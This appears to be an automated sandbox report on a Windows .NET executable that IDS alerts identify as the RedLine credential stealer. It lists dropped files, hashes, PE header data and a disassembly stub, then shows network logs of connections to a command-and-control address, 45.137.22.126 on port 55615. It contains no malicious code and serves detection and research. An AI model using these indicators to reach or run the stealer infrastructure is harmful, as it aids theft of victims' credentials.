                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1026
                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1026
                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\9dOKGgFNL2.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):7.761554280381937
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            File name:9dOKGgFNL2.exe
                                                                                                                                            File size:534'528 bytes
                                                                                                                                            MD5:020ec1df3b8b9d28da16edaf0d50a262
                                                                                                                                            SHA1:b9b841c39445febc098f7edbda4112194615fc10
                                                                                                                                            SHA256:6eaf9b6af911a7995d490906ff5d42a36a47e4b1d4510f6fc33c7cdab2c80aae
                                                                                                                                            SHA512:214c186d842409891d905d612223b944ec8e0d86cb344aada20e35b211ec908c84469d266d961162e7d70d4300471c7d9ce1401e7552b10d8d7d9412b96d5261
                                                                                                                                            SSDEEP:12288:IMyCpQuRWIPxTIeVJbZnjlz3W/9Fex4XmwRzbgTzzha+:IMyCQuHzHx6/XeKXJy1
                                                                                                                                            TLSH:6EB40164FA25E957CAE547F81431D3BA07B68D4DE812D3039FEAACD73C06B1D6A04293
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3g..............0..............&... ...@....@.. ....................................`................................
                                                                                                                                            Icon Hash:1bb3b3b3b3d389b3
                                                                                                                                            Entrypoint:0x48269e
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x6733F893 [Wed Nov 13 00:53:39 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                            Instruction
                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8264b0x4f.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x1b48.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x806d80x54.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x20000x806a40x80800df1912e430955b2a4cbcfee03a136d9cFalse0.8940809672908561data7.770995746521688IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0x840000x1b480x1c0057997b2441a336a16ef2b08040b4c0b4False0.7726004464285714data7.226831072922865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .reloc0x860000xc0x200d8d6d45757f1a173512e291562cbb0d5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0x841300x151aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8863383931877082
                                                                                                                                            RT_GROUP_ICON0x8564c0x14data0.9
                                                                                                                                            RT_VERSION0x856600x2fcdata0.4410994764397906
                                                                                                                                            RT_MANIFEST0x8595c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                            DLLImport
                                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-11-17T03:07:03.465942+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.44973345.137.22.12655615TCP
                                                                                                                                            2024-11-17T03:07:08.476379+01002045000ET MALWARE RedLine Stealer - CheckConnect Response145.137.22.12655615192.168.2.449733TCP
                                                                                                                                            2024-11-17T03:07:08.786615+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.44973345.137.22.12655615TCP
                                                                                                                                            2024-11-17T03:07:11.420400+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound145.137.22.12655615192.168.2.449733TCP
                                                                                                                                            2024-11-17T03:07:11.420400+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)145.137.22.12655615192.168.2.449733TCP
                                                                                                                                            2024-11-17T03:07:11.473182+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.44973745.137.22.12655615TCP
                                                                                                                                            2024-11-17T03:07:13.993295+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.44973845.137.22.12655615TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 17, 2024 03:07:02.567902088 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:02.573175907 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:02.573249102 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:02.587853909 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:02.592741013 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:02.935049057 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:02.940236092 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:03.422421932 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:03.465941906 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:08.471224070 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:08.471296072 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:08.476378918 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.476547956 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786478996 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786526918 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786561966 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786598921 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786614895 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:08.786633968 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:08.786705971 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:08.840959072 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.414999962 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.415204048 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.420197010 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.420280933 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.420399904 CET556154973345.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.420510054 CET4973355615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.420854092 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.421082973 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.425668001 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.425987959 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.425997019 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.426048994 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.426057100 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.426069021 CET556154973745.137.22.126192.168.2.4
